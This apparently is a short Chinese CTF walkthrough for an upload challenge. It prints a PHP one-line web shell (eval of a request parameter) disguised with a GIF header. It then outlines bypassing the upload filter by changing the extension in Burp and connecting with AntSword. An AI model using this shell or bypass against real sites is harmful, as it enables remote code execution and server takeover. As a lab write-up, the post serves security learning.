[ACTF2020 新生赛]Upload1

不拿flag不改名2024-09-12 13:20

1、点开题目链接,页面显示如下,上传test.jpg里面包含一句话木马

GIF89a? <script language="php">eval($_REQUEST[1])</script>

2、使用bp抓包修改后缀,点击发送

3、不关浏览器的代理,在bp中将该包放行

4、用蚁剑连接

5、在根目录中找到flag

相关推荐
Libraeking1 小时前
视觉篇:Canvas 自定义绘图与高级动画的华丽圆舞曲
android·经验分享·android jetpack
Fushize2 小时前
多模块架构下的依赖治理:如何避免 Gradle 依赖地狱
android·架构·kotlin
Jomurphys2 小时前
Kotlin - 类型别名 typealias
android·kotlin
Haha_bj3 小时前
Flutter ——flutter_screenutil 屏幕适配
android·ios
Haha_bj3 小时前
Flutter ——device_info_plus详解
android·flutter·ios
前端小伙计3 小时前
Android/Flutter 项目统一构建配置最佳实践
android·flutter
Mr_sun.4 小时前
Day09——入退管理-入住-2
android·java·开发语言
ujainu5 小时前
告别杂乱!Flutter + OpenHarmony 鸿蒙记事本的标签与分类管理(三)
android·flutter·openharmony
常利兵6 小时前
Android内存泄漏:成因剖析与高效排查实战指南
android
·云扬·6 小时前
MySQL 8.0 Redo Log 归档与禁用实战指南
android·数据库·mysql
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03openclaw配置教程(linux+局域网ollama)04UV安装并设置国内源05Linux下V2Ray安装配置指南06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07openclaw使用nginx反代部署过程 与disconnected (1008): pairing required解决08Claude Code Skills 实用使用手册09在Trae中使用Pencil MCP10Vue-skills的中文文档